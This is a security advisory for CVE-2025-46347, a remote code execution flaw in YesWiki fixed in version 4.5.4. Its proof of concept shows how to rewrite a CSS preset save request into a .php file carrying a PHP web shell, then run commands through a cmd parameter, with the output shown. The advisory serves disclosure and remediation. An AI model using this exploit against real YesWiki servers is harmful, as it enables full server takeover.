GHSA-88xg-v53p-fpvf
Suggest an improvement- Source
- https://github.com/advisories/GHSA-88xg-v53p-fpvf
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-88xg-v53p-fpvf/GHSA-88xg-v53p-fpvf.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-88xg-v53p-fpvf
- Aliases
-
- CVE-2025-46347
- Published
- 2025-04-29T14:45:42Z
- Modified
- 2025-04-29T20:57:25.553898Z
- Severity
-
- 7.4 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
- Summary
- YesWiki Remote Code Execution via Arbitrary PHP File Write and Execution
- Details
-
Summary
An arbitrary file write can be used to write a file with a PHP extension, which then can be browsed to in order to execute arbitrary code on the server.
All testing was performed on a local docker setup running the latest version of the application.
PoC
Proof of Concept
Navigate to
http://localhost:8085/?LookWikiwhich allows you to clickCreate a new Graphical configurationwhere you specify some parameters and then clickSave.After clicking save, this request is made (most headers removed for clarity):
POST /?api/templates/custom-presets/test.css HTTP/1.1 Host: localhost:8085 primary-color=%230c5d6a&secondary-color-1=%23d8604c&secondary-color-2=%23d78958&neutral-color=%234e5056&neutral-soft-color=%2357575c&neutral-light-color=%23f2f2f2&main-text-fontsize=17px&main-text-fontfamily=%22Nunito%22%2C+sans-serif&main-title-fontfamily='Nunito'%2C+sans-serifThis request writes the file
test.cssto disk with the contents (abbreviated):root { --primary-color: #0c5d6a; --secondary-color-1: #d8604c; --secondary-color-2: #d78958; --neutral-color: #4e5056; --neutral-soft-color: #57575c; --neutral-light-color: #f2f2f2; --main-text-fontsize: 17px; --main-text-fontfamily: "Nunito", sans-serif; --main-title-fontfamily: 'Nunito', sans-serif; }To exploit this, utilize a proxy tool to intercept the the first request and change the filename extension to
.phpand add arbitrary PHP code in for one of the request body parameters.e.g.
primary-color=%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3ENow the file
pizzapower.phpis written to/var/www/html/custom/css-presets/pizzapower.phpand it starts with this, where the PHP code is present.:root { --primary-color: <?php system($_GET['cmd']); ?>; --secondary-color-1: #d8604c; --secondary-color-2: #d78958; --neutral-color: #4e5056; --neutral-soft-color: #57575c; --neutral-light-color: #f2f2f2; --main-text-fontsize: 17px; --main-text-fontfamily: "Nunito", sans-serif; --main-title-fontfamily: 'Nunito', sans-serif; }Then, simply visit the file with a
cmdparameter included.http://localhost:8085/custom/css-presets/pizzapower.php?cmd=idAnd the HTTP response will contain the output of our command. Notably this request can be performed unauthenticated (the creation of the file requires auth, though).
:root { --primary-color: uid=501(yeswiki) gid=501 groups=501 ; --secondary-color-1: #d8604c; --secondary-color-2: #d78958; --neutral-color: #4e5056; --neutral-soft-color: #57575c; --neutral-light-color: #f2f2f2; --main-text-fontsize: 17px; --main-text-fontfamily: "Nunito", sans-serif; --main-title-fontfamily: 'Nunito', sans-serif; }Impact
Full compromise of the server. Can potentially be performed unwittingly by a user subjected to the previously reported (or future) XSS vulnerabilities.
Fixes
Amongst others:
Restrict file extensions: Only allow a safelist of extensions (e.g., .css) when saving files via this feature. Harden server config: Disable PHP execution in user-writable directories
- Database specific
{ "nvd_published_at": "2025-04-29T18:15:44Z", "cwe_ids": [ "CWE-116" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-04-29T14:45:42Z" }- References
Affected packages
Packagist / yeswiki/yeswiki
Package
- Name
- yeswiki/yeswiki
- Purl
- pkg:composer/yeswiki/yeswiki
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed4.5.4